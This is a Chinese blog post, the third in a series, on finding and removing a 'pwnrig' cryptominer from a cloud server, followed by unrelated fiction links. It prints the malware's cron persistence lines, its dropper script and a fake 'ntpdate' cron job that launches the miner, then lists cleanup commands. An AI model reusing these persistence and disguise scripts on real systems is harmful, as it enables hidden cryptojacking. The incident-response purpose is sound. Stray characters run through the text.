云服務(wù)器中挖礦病毒的清除過程(三)

背景

服務(wù)器CPU使用率50%,被兩個進(jìn)程占用,名稱分別為
-mysql
zfsutils-md5sum


image.png

診斷

使用crontab -l查看定時任務(wù)矩屁,發(fā)現(xiàn)病毒文件-mysql

[root@server1 ~]# crontab -l
* * * * * /var/.log/-mysql > /dev/null <&1 2>&1 & disown
@monthly /var/.log/-mysql > /dev/null <&1 2>&1 & disown
@reboot /var/.log/-mysql > /dev/null <&1 2>&1 & disown

查看這個/var/.log/目錄棚点,發(fā)現(xiàn)更多病毒文件,-mysql是個腳本冻璃,內(nèi)容如下

[root@server1 .log]# ll
total 2904
-rwxr-xr-x. 1 root root 1087356 Dec 17  2020 i686
-rwxr-xr-x. 1 root root     115 Dec 29 01:16 -mysql
-rwxr-xr-x. 1 root root 1878380 Feb 15  2021 x86_64
[root@server1 .log]# cat ./-mysql
#!/bin/bash
cd -- /var/.log
mkdir -- .-mysql
cp -f -- x86_64 .-mysql/-mysql
./.-mysql/-mysql -c
rm -rf -- .-mysql

查看/etc/crontab.daily目錄响谓,發(fā)現(xiàn)一個文件名為ntpdate

[root@server1 cron.hourly]# cat /etc/cron.hourly/ntpdate
#!/bin/bash
#
#      Start/Stop the pwnrig clock daemon
#
# chkconfig 2345 90 60
# description: sync clock (GNU System)
cp -f -r -- /bin/sysprg /usr/bin/-mysql 2>/dev/null
cd /usr/bin/ 2>/dev/null
./-mysql -c >/dev/null
rm -rf -- -mysql 2>/dev/null

/bin/sysprg創(chuàng)建日期與ntupdate是同一天,文件大小與x86_64相同省艳,無疑也是個病毒文件娘纷。

清除病毒

  1. 殺掉進(jìn)程
  2. 刪除crontab -e 中的內(nèi)容,但是發(fā)現(xiàn)無法刪除
[root@server1 nps]# crontab -e
crontab: installing new crontab
crontab: error renaming /var/spool/cron/#tmp.XXXXGFRvjK to /var/spool/cron/root
rename: Operation not permitted
crontab: edits left in /tmp/crontab.Bw1XGv

進(jìn)入到/var/spool/cron目錄查看文件權(quán)限跋炕,發(fā)現(xiàn)被加了保護(hù)赖晶,使用lsattr去除,再編輯刪除內(nèi)容即可

[root@server1 cron]# lsattr ./root
----i--------e- ./root
[root@server1 cron]# chattr -ia ./root
[root@server1 cron]# crontab -e
crontab: installing new crontab
  1. 清除/etc/crontab.xxx中的文件ntpdate辐烂,發(fā)現(xiàn)都被加了保護(hù)無法刪除遏插,同樣適用lsattr進(jìn)行權(quán)限去除
    注意/etc/sysconfig/ntpdate不要刪除
[root@server1 /etc]# chattr -ia `find . -name "ntpdate"`
[root@server1 /etc]# rm /etc/cron.daily/ntpdate
  1. 清除病毒文件
[root@server1 /var]# rm /var/.log -rf
[root@server1 /var]# chattr -ia /bin/sysprg
[root@server1 /var]# rm /bin/sysprg -rf

防范措施

禁用crontab

service crond stop
mv /var/spool/cron  /var/spool/cron_is_disabled

關(guān)聯(lián)文章

云服務(wù)器中挖礦病毒的清除過程(一)
云服務(wù)器中挖礦病毒的清除過程(二)

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 人面猴
    序言:七十年代末,一起剝皮案震驚了整個濱河市纠修,隨后出現(xiàn)的幾起案子胳嘲,更是在濱河造成了極大的恐慌,老刑警劉巖扣草,帶你破解...
    沈念sama閱讀 206,723評論 6 481
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件了牛,死亡現(xiàn)場離奇詭異,居然都是意外死亡辰妙,警方通過查閱死者的電腦和手機(jī)鹰祸,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,485評論 2 382
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來密浑,“玉大人蛙婴,你說我怎么就攤上這事《疲” “怎么了街图?”我有些...
    開封第一講書人閱讀 152,998評論 0 344
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵,是天一觀的道長懒构。 經(jīng)常有香客問我台夺,道長,這世上最難降的妖魔是什么痴脾? 我笑而不...
    開封第一講書人閱讀 55,323評論 1 279
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任,我火速辦了婚禮梳星,結(jié)果婚禮上赞赖,老公的妹妹穿的比我還像新娘。我一直安慰自己冤灾,他們只是感情好前域,可當(dāng)我...
    茶點故事閱讀 64,355評論 5 374
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布。 她就那樣靜靜地躺著韵吨,像睡著了一般匿垄。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 49,079評論 1 285
  • 城市分裂傳說
    那天椿疗,我揣著相機(jī)與錄音漏峰,去河邊找鬼。 笑死届榄,一個胖子當(dāng)著我的面吹牛浅乔,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播铝条,決...
    沈念sama閱讀 38,389評論 3 400
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼靖苇,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了班缰?” 一聲冷哼從身側(cè)響起贤壁,我...
    開封第一講書人閱讀 37,019評論 0 259
  • 萬榮殺人案實錄
    序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎埠忘,沒想到半個月后脾拆,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 43,519評論 1 300
  • ?護(hù)林員之死
    正文 獨居荒郊野嶺守林人離奇死亡给梅,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 35,971評論 2 325
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年假丧,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片动羽。...
    茶點故事閱讀 38,100評論 1 333
  • 活死人
    序言:一個原本活蹦亂跳的男人離奇死亡包帚,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出运吓,到底是詐尸還是另有隱情渴邦,我是刑警寧澤,帶...
    沈念sama閱讀 33,738評論 4 324
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布拘哨,位于F島的核電站谋梭,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏倦青。R本人自食惡果不足惜瓮床,卻給世界環(huán)境...
    茶點故事閱讀 39,293評論 3 307
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望产镐。 院中可真熱鬧隘庄,春花似錦、人聲如沸癣亚。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,289評論 0 19
  • 一樁弒父案,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽述雾。三九已至街州,卻和暖如春兼丰,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背唆缴。 一陣腳步聲響...
    開封第一講書人閱讀 31,517評論 1 262
  • 情欲美人皮
    我被黑心中介騙來泰國打工鳍征, 沒想到剛下飛機(jī)就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人琐谤。 一個月前我還...
    沈念sama閱讀 45,547評論 2 354
  • 代替公主和親
    正文 我出身青樓蟆技,卻偏偏與公主長得像,于是被迫代替她去往敵國和親斗忌。 傳聞我的和親對象是個殘疾皇子质礼,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 42,834評論 2 345

推薦閱讀更多精彩內(nèi)容